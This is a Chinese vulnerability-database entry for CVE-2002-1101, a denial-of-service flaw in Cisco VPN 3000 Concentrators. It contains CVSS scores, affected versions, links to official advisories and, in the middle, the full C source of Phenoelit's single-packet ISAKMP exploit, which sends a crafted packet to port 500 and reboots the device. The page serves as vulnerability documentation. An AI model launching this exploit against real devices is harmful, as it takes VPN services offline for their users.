CVE-2002-1101
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:47
NMCOE    

[原文]Cisco VPN 3000 Concentrator 2.2.x, 3.6(Rel), and 3.x before 3.5.5, allows remote attackers to cause a denial of service via a long user name.


[CNNVD]Cisco VPN 3000 Concentrator拒绝服务漏洞(CNNVD-200210-062)

        Cisco VPN 3000 Concentrator 2.2.x版本,3.6(Rel)版本,以及3.5.5之前的3.x版本存在漏洞。远程攻击者可以借助一个超长用户名导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:cisco:vpn_3000_concentrator:3.0.4
cpe:/o:cisco:vpn_3000_concentrator:3.5%28rel%29
cpe:/o:cisco:vpn_3000_concentrator:3.1
cpe:/a:cisco:vpn_3002_hardware_clientCisco VPN 3002 Hardware Client
cpe:/o:cisco:vpn_3000_concentrator:3.1.2
cpe:/o:cisco:vpn_3000_concentrator:3.6%28rel%29
cpe:/o:cisco:vpn_3000_concentrator:3.0%28rel%29
cpe:/o:cisco:vpn_3000_concentrator:3.5.3
cpe:/o:cisco:vpn_3000_concentrator:3.1%28rel%29
cpe:/o:cisco:vpn_3000_concentrator:2.0
cpe:/o:cisco:vpn_3000_concentrator:2.5.2.d
cpe:/o:cisco:vpn_3000_concentrator:3.1.1
cpe:/o:cisco:vpn_3000_concentrator:2.5.2.b
cpe:/o:cisco:vpn_3000_concentrator:3.0.3.b
cpe:/o:cisco:vpn_3000_concentrator:2.5.2.c
cpe:/o:cisco:vpn_3000_concentrator:3.0
cpe:/o:cisco:vpn_3000_concentrator:2.5.2.f
cpe:/o:cisco:vpn_3000_concentrator:3.1.4
cpe:/o:cisco:vpn_3000_concentrator:3.5.1
cpe:/o:cisco:vpn_3000_concentrator:3.0.3.a
cpe:/o:cisco:vpn_3000_concentrator:3.5.2
cpe:/o:cisco:vpn_3000_concentrator:3.5.4
cpe:/o:cisco:vpn_3000_concentrator:2.5.2.a

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1101
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1101
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-062
(官方数据源) CNNVD

- 其它链接及资源

http://www.cisco.com/warp/public/707/vpn3k-multiple-vuln-pub.shtml
(VENDOR_ADVISORY)  CISCO  20020903 Cisco VPN 3000 Concentrator Multiple Vulnerabilities

- 漏洞信息

Cisco VPN 3000 Concentrator拒绝服务漏洞
中危 未知
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        Cisco VPN 3000 Concentrator 2.2.x版本,3.6(Rel)版本,以及3.5.5之前的3.x版本存在漏洞。远程攻击者可以借助一个超长用户名导致服务拒绝。

- 公告与补丁

        

- 漏洞信息 (21770)

Cisco VPN 3000 Series Concentrator Client Authentication Denial Of Service Vulnerability (EDBID:21770)
hardware dos
2002-09-03 Verified
0 Phenoelit
N/A [点击下载]
source: http://www.securityfocus.com/bid/5620/info

Cisco VPN 3000 series concentrators are prone to a denial of service condition when receiving an overly long username string during authentication from a VPN client.

Successful exploitation will cause the device to reload. 

/* ISAKMP Cisco VPN Concentrator DoS 
 * by nowin of Phenoelit <nowin@phenoelit.de>
 *    FX of Phenoelit <fx@phenoelit.de>
 * http://www.phenoelit.de
 * (C) 2002 
 *
 * Cisco VPN Concentrator 3000 Series, Software <=3.6.0 
 * Single Packet Denial of Service. 
 * The device will reboot upon receiving this packet.
 * This is probalby exploitable, but we don't have a Concentrator to test.
 *
 * Greets are in the packet.
 */

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <time.h>

#define SPLASH          \
        "Phenoelit Cisco VPN Killer\n" \
	" Cisco VPN Concentrator 3000 DoS (3.6.0 and below)\n" \
	" (C) 2002 - nowin of Phenoelit <nowin@phenoelit.de>\n" \
	"            FX of Phenoelit <fx@phenoelit.de>\n"


struct {
    struct in_addr	dest;
    int			sfd;
} cfg;


void *smalloc(size_t s);
int send500(char *packet, int len);


char	fixed_ISAKMP[] =
	"\xf0\x0d\xf0\x0d\xf0\x0d\xf0\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x01"
	"\x10\x04\x00\x00\x00\x00\x00\x00\x00\x0F\xFF\x04\x00\x01\x34\x00\x00"
	"\x00\x01\x00\x00\x00\x01\x00\x00\x01\x28\x01\x01\x00\x08\x03\x00\x00"
	"\x24\x01\x01\x00\x00\x80\x01\x00\x05\x80\x02\x00\x02\x80\x04\x00\x02"
	"\x80\x03\xfd\xe9\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x20\xc4\x9b\x03"
	"\x00\x00\x24\x02\x01\x00\x00\x80\x01\x00\x05\x80\x02\x00\x01\x80\x04"
	"\x00\x02\x80\x03\xfd\xe9\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x20\xc4"
	"\x9b\x03\x00\x00\x24\x03\x01\x00\x00\x80\x01\x00\x05\x80\x02\x00\x02"
	"\x80\x04\x00\x02\x80\x03\x00\x01\x80\x0b\x00\x01\x00\x0c\x00\x04\x00"
	"\x20\xc4\x9b\x03\x00\x00\x24\x04\x01\x00\x00\x80\x01\x00\x05\x80\x02"
	"\x00\x01\x80\x04\x00\x02\x80\x03\x00\x01\x80\x0b\x00\x01\x00\x0c\x00"
	"\x04\x00\x20\xc4\x9b\x03\x00\x00\x24\x01\x01\x00\x00\x80\x01\x00\x01"
	"\x80\x02\x00\x02\x80\x04\x00\x02\x80\x03\xfd\xe9\x80\x0b\x00\x01\x00"
	"\x0c\x00\x04\x00\x20\xc4\x9b\x03\x00\x00\x24\x02\x01\x00\x00\x80\x01"
	"\x00\x01\x80\x02\x00\x01\x80\x04\x00\x02\x80\x03\xfd\xe9\x80\x0b\x00"
	"\x01\x00\x0c\x00\x04\x00\x20\xc4\x9b\x03\x00\x00\x24\x03\x01\x00\x00"
	"\x80\x01\x00\x01\x80\x02\x00\x02\x80\x04\x00\x02\x80\x03\x00\x01\x80"
	"\x0b\x00\x01\x00\x0c\x00\x04\x00\x20\xc4\x9b\x00\x00\x00\x24\x04\x01"
	"\x00\x00\x80\x01\x00\x01\x80\x02\x00\x01\x80\x04\x00\x02\x80\x03\x00"
	"\x01\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x20\xc4\x9b\x0a\x00\x00\x84"
	"\x41\x6E\x64\x20\x50\x68\x65\x6E\x6F\x65\x6C\x69\x74\x20\x73\x61\x79"
	"\x73\x3A\x20\x54\x68\x69\x73\x20\x62\x75\x67\x20\x69\x73\x20\x61\x77"
	"\x61\x72\x64\x65\x64\x20\x74\x6F\x20\x53\x65\x61\x6E\x20\x43\x6F\x6E"
	"\x76\x65\x72\x79\x20\x66\x6F\x72\x20\x65\x78\x63\x65\x6C\x6C\x65\x6E"
	"\x63\x65\x20\x69\x6E\x20\x63\x6F\x70\x79\x20\x61\x6E\x64\x20\x70\x61"
	"\x73\x74\x65\x2E\x20\x47\x72\x65\x65\x74\x73\x3A\x20\x48\x61\x6C\x76"
	"\x61\x72\x2C\x52\x69\x6C\x65\x79\x2C\x4E\x69\x63\x6F\x26\x53\x65\x62"
	"\x61\x73\x74\x69\x65\x6E\x2E\x2E\x2E"
	"\x05\x00\x00\x18 -==| PHENOELIT |==-" 
	"\x00\x00\x00\x04\x0b\x11\x01\xf4 Eat this and die!"
	;


int main(int argc, char **argv) {
    char		option;
    extern char		*optarg;

    int			plen;
    char		*c;


    printf("%s\n",SPLASH);

    memset(&cfg,0,sizeof(cfg));
    while ((option=getopt(argc,argv,"d:"))!=EOF) {
	switch (option) {
	    case 'd':	if (inet_aton(optarg,&(cfg.dest))==0) {
			    fprintf(stderr,"Address of -d argument not IP\n");
			    return (1);
			}
			break;
	    default:	fprintf(stderr,"%s -d <ip_address>\n",argv[0]);
			return (1);
	}
    } 

    if (!(*((u_int32_t *)&(cfg.dest)))) {
	fprintf(stderr,"%s -d <ip_address>\n",argv[0]);
	return (1);
    }

    plen=sizeof(fixed_ISAKMP)-1;
    c=(char *)smalloc(plen);
    memcpy(c,fixed_ISAKMP,sizeof(fixed_ISAKMP)-1);

    send500(c,plen);

    printf("Packet sent.\n");

    free (c);
    return 0;
}


int send500(char *packet, int len) {
    struct sockaddr_in	sin;

    if ((cfg.sfd=socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP))<0) {
	perror("socket()");
	return (-1);
    }

    memset(&sin,0,sizeof(struct sockaddr_in));
    sin.sin_family=PF_INET;
    sin.sin_port=htons(500);
    memcpy(&(sin.sin_addr),&(cfg.dest),sizeof(sin.sin_addr));
    if (sendto(cfg.sfd,packet,len,0,
		(struct sockaddr *)&sin,
		sizeof(struct sockaddr_in))<=0) {
	perror("sendto()");
	return (-1);
    }

    return (0);

}

void *smalloc(size_t s) {
    void *p;

    if ((p=malloc(s))==NULL) {
	fprintf(stderr,"smalloc(): fatal! Allocation of %u bytes failed\n",s);
	exit (-1);
    }
    memset(p,0,s);
    return p;
}
		

- 漏洞信息

8923
Cisco VPN 3000 Concentrator VPN Client Username Overflow DoS
Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- 漏洞描述

- 时间线

2002-09-03 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站